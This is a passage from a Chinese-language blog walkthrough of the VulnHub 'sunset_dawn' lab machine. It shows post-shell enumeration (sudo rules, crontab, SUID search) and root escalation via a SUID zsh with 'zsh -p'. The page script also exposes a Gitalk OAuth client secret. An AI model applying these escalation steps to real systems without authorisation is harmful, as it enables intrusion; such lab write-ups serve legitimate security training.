192.168.56.255 scope global dynamic enp0s3</span><br><span class="hljs-string">       valid_lft 443sec preferred_lft 443sec</span><br><span class="hljs-string">    inet6 fe80::a00:27ff:fe84:97e0/64 scope link </span><br><span class="hljs-string">       valid_lft forever preferred_lft forever</span><br><span class="hljs-string">$ python -c &quot;import pty;pty.spawn(&#x27;</span>/bin/bash<span class="hljs-string">&#x27;)&quot;</span><br><span class="hljs-string">www-data@dawn:~$</span><br></code></pre></td></tr></table></figure>

<p>基础的信息收集</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs bash">www-data@dawn:~/html$ <span class="hljs-built_in">ls</span> -alih<br><span class="hljs-built_in">ls</span> -alih<br>total 24K<br>16513 drwxr-xr-x 4 root root 4.0K Aug  3  2019 .<br>16512 drwxr-xr-x 3 root root 4.0K Aug  1  2019 ..<br>11120 drw------- 2 root root 4.0K Aug  1  2019 cctv<br>11145 -rw-r--r-- 1 root root  791 Aug  3  2019 index.html<br> 9264 -rw-r--r-- 1 root root 1.0K Aug  3  2019 .index.html.swp<br>16523 drwxr-xr-x 2 root root 4.0K Aug  1  2019 logs<br>www-data@dawn:~/html$ <span class="hljs-built_in">cd</span> cctv   <br><span class="hljs-built_in">cd</span> cctv<br>bash: <span class="hljs-built_in">cd</span>: cctv: Permission denied<br>www-data@dawn:~/html$ <span class="hljs-built_in">cat</span> .index.html.swp<br><span class="hljs-built_in">cat</span> .index.html.swp<br>b0nano 3.2rootdawn/var/www/html/index.htmlU<br><br>www-data@dawn:/home/dawn$ sudo -l<br>sudo -l<br>Matching Defaults entries <span class="hljs-keyword">for</span> www-data on dawn:<br>    env_reset, mail_badpass,<br>    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin<br><br>User www-data may run the following commands on dawn:<br>    (root) NOPASSWD: /usr/bin/sudo<br></code></pre></td></tr></table></figure>

<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>好家伙竟然可以无密码以 root 权限运行 sudo，直接 sudo su 试试？</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs bash">www-data@dawn:/home/dawn$ /usr/bin/sudo su<br>/usr/bin/sudo su<br><br>We trust you have received the usual lecture from the <span class="hljs-built_in">local</span> System<br>Administrator. It usually boils down to these three things:<br><br>    <span class="hljs-comment">#1) Respect the privacy of others.</span><br>    <span class="hljs-comment">#2) Think before you type.</span><br>    <span class="hljs-comment">#3) With great power comes great responsibility.</span><br><br>[sudo] password <span class="hljs-keyword">for</span> www-data: <br><br>Sorry, try again.<br>[sudo] password <span class="hljs-keyword">for</span> www-data: <br><br>Sorry, try again.<br>[sudo] password <span class="hljs-keyword">for</span> www-data: <br><br>sudo: 3 incorrect password attempts<br></code></pre></td></tr></table></figure>

<p>要输密码？？我不理解</p>
<p>接下来就这个命令尝试了各种方法，但是均需要密码，还尝试了用网站根目录下隐藏的文件中的内容作为密码，也都失败了</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs elixir">www-data<span class="hljs-variable">@dawn</span><span class="hljs-symbol">:/home/dawn</span><span class="hljs-variable">$ </span>sudo nano<br>sudo nano<br><br><span class="hljs-title class_">We</span> trust you have received the usual lecture from the local <span class="hljs-title class_">System</span><br><span class="hljs-title class_">Administrator</span>. <span class="hljs-title class_">It</span> usually boils down to these three <span class="hljs-symbol">things:</span><br><br>    <span class="hljs-comment">#1) Respect the privacy of others.</span><br>    <span class="hljs-comment">#2) Think before you type.</span><br>    <span class="hljs-comment">#3) With great power comes great responsibility.</span><br><br>[sudo] password <span class="hljs-keyword">for</span> www-<span class="hljs-symbol">data:</span> <br></code></pre></td></tr></table></figure>

<p>家人们还是看看远方的定时任务和 SUID 吧</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs bash">www-data@dawn:/home/ganimedes$ <span class="hljs-built_in">cat</span> /etc/crontab<br><span class="hljs-built_in">cat</span> /etc/crontab<br><span class="hljs-comment"># /etc/crontab: system-wide crontab</span><br><span class="hljs-comment"># Unlike any other crontab you don&#x27;t have to run the `crontab&#x27;</span><br><span class="hljs-comment"># command to install the new version when you edit this file</span><br><span class="hljs-comment"># and files in /etc/cron.d. These files also have username fields,</span><br><span class="hljs-comment"># that none of the other crontabs do.</span><br><br>SHELL=/bin/sh<br>PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin<br><br><span class="hljs-comment"># Example of job definition:</span><br><span class="hljs-comment"># .---------------- minute (0 - 59)</span><br><span class="hljs-comment"># |  .------------- hour (0 - 23)</span><br><span class="hljs-comment"># |  |  .---------- day of month (1 - 31)</span><br><span class="hljs-comment"># |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...</span><br><span class="hljs-comment"># |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat</span><br><span class="hljs-comment"># |  |  |  |  |</span><br><span class="hljs-comment"># *  *  *  *  * user-name command to be executed</span><br>17 *    * * *   root    <span class="hljs-built_in">cd</span> / &amp;&amp; run-parts --report /etc/cron.hourly<br>25 6    * * *   root    <span class="hljs-built_in">test</span> -x /usr/sbin/anacron || ( <span class="hljs-built_in">cd</span> / &amp;&amp; run-parts --report /etc/cron.daily )<br>47 6    * * 7   root    <span class="hljs-built_in">test</span> -x /usr/sbin/anacron || ( <span class="hljs-built_in">cd</span> / &amp;&amp; run-parts --report /etc/cron.weekly )<br>52 6    1 * *   root    <span class="hljs-built_in">test</span> -x /usr/sbin/anacron || ( <span class="hljs-built_in">cd</span> / &amp;&amp; run-parts --report /etc/cron.monthly )<br><span class="hljs-comment">#</span><br>www-data@dawn:/home/ganimedes$ find / -<span class="hljs-built_in">type</span> f -perm -04000 2&gt;/dev/null<br>find / -<span class="hljs-built_in">type</span> f -perm -04000 2&gt;/dev/null<br>/usr/sbin/mount.cifs<br>/usr/lib/dbus-1.0/dbus-daemon-launch-helper<br>/usr/lib/policykit-1/polkit-agent-helper-1<br>/usr/lib/eject/dmcrypt-get-device<br>/usr/lib/openssh/ssh-keysign<br>/usr/bin/su<br>/usr/bin/newgrp<br>/usr/bin/pkexec<br>/usr/bin/passwd<br>/usr/bin/sudo<br>/usr/bin/mount<br>/usr/bin/zsh<br>/usr/bin/gpasswd<br>/usr/bin/chsh<br>/usr/bin/umount<br>/usr/bin/chfn<br></code></pre></td></tr></table></figure>

<p>好家伙，zsh 也是 SUID，这么简单就提权了吗</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs bash">www-data@dawn:/home/ganimedes$ /usr/bin/zsh -p<br>/usr/bin/zsh -p<br>dawn<span class="hljs-comment"># whoami                                                                   </span><br><span class="hljs-built_in">whoami</span><br>root<br>dawn<span class="hljs-comment"># id                                                                       </span><br><span class="hljs-built_in">id</span><br>uid=33(www-data) gid=33(www-data) euid=0(root) <span class="hljs-built_in">groups</span>=33(www-data)<br>dawn<span class="hljs-comment"># ip a                                                                     </span><br>ip a<br>1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000<br>    <span class="hljs-built_in">link</span>/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00<br>    inet 127.0.0.1/8 scope host lo<br>       valid_lft forever preferred_lft forever<br>    inet6 ::1/128 scope host <br>       valid_lft forever preferred_lft forever<br>2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000<br>    <span class="hljs-built_in">link</span>/ether 08:00:27:84:97:e0 brd ff:ff:ff:ff:ff:ff<br>    inet 192.168.56.134/24 brd 192.168.56.255 scope global dynamic enp0s3<br>       valid_lft 506sec preferred_lft 506sec<br>    inet6 fe80::a00:27ff:fe84:97e0/64 scope <span class="hljs-built_in">link</span> <br>       valid_lft forever preferred_lft forever<br>dawn<span class="hljs-comment"># uname -a                                                                 </span><br><span class="hljs-built_in">uname</span> -a<br>Linux dawn 4.19.0-5-amd64 <span class="hljs-comment">#1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 GNU/Linu</span><br></code></pre></td></tr></table></figure>

<p>还真是，竟然这么快就结束了，确实是 easy 难度的靶机，不过定时任务没起来导致日志文件没信息可难受死我了。收尾 flag。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash">dawn<span class="hljs-comment"># cd /root                                                                 </span><br><span class="hljs-built_in">cd</span> /root<br>dawn<span class="hljs-comment"># ls                                                                       </span><br><span class="hljs-built_in">ls</span><br>flag.txt  pspy64<br>dawn<span class="hljs-comment"># cat flag.txt                                                             </span><br><span class="hljs-built_in">cat</span> flag.txt<br>Hello! whitecr0wz here. I would like to congratulate and thank you <span class="hljs-keyword">for</span> finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available <span class="hljs-keyword">for</span> rooting this box!<br><br>flag&#123;3a3e52f0a6af0d6e36d7c1ced3a9fd59&#125;<br></code></pre></td></tr></table></figure>

<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h2><p>关于 sudo 如何切换用户不需要密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ sudo sudo su<br><span class="hljs-built_in">whoami</span><br>root<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/knowledge-database/" class="category-chain-item">knowledge_database</a>
  
  
    <span>></span>
    
  <a href="/categories/knowledge-database/vulnhub/" class="category-chain-item">vulnhub</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>sunset_dawn 靶机</div>
      <div>https://i3eg1nner.github.io/2023/08/5d3dbe7ff791.html</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>I3eg1nner</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年8月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/08/6d61acd6e537.html" title="The_Library 靶机">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">The_Library 靶机</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/08/c7207977b36b.html" title="Healthcare_1 靶机">
                        <span class="hidden-mobile">Healthcare_1 靶机</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"a14e9a13405642f51885","clientSecret":"5662f466deab58fdbbacd0ae3718eaf1625401dd","repo":"gitalk","owner":"I3eg1nner","admin":["I3eg1nner"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":false,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: '48ff2bc2532b31b481c0bf24318d6c34'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
